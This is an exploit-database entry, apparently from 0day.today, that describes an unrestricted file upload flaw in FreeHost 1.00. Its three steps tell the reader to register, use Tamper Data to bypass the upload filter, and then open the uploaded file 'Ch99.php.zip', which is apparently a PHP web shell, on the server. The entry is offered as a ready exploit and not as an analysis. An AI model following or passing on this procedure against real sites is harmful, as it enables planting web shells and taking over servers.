id: 11294
date: 03/15/2010
title: FreeHost Version 1.00 Upload Vulnerability
author: indoushka
cves: 

==========================================
FreeHost Version 1.00 Upload Vulnerability
==========================================

========================================================================================
| # Title    : FreeHost Version 1.00 Upload Vulnerability
| # Author   : indoushka
| # Script   : Powered by FreeHost Version 1.00
| # Tested on: windows SP2 Fran&#29393;ais V.(Pnx2 2.0) + Lunix Fran&#29393;ais v.(9.4 Ubuntu)
| # Bug      : Upload
|
======================      Exploit By indoushka       =================================
 # Exploit  :
 
 1 - register in : http://127.0.0.1/FreeHost/register.php
 
 2- go to your panel 2 upload and use Tamper Data
     http://127.0.0.1/FreeHost/upload.php
 
3- go to you Folder name t find your Ev!l
   http://127.0.0.1/FreeHost/u/indoushka/Ch99.php.zip



#  0day.today [2023-03-24]  #